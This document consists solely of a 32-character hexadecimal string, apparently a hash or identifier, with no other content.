bc4d47d6f8bd4c489a02e503dc28f0b2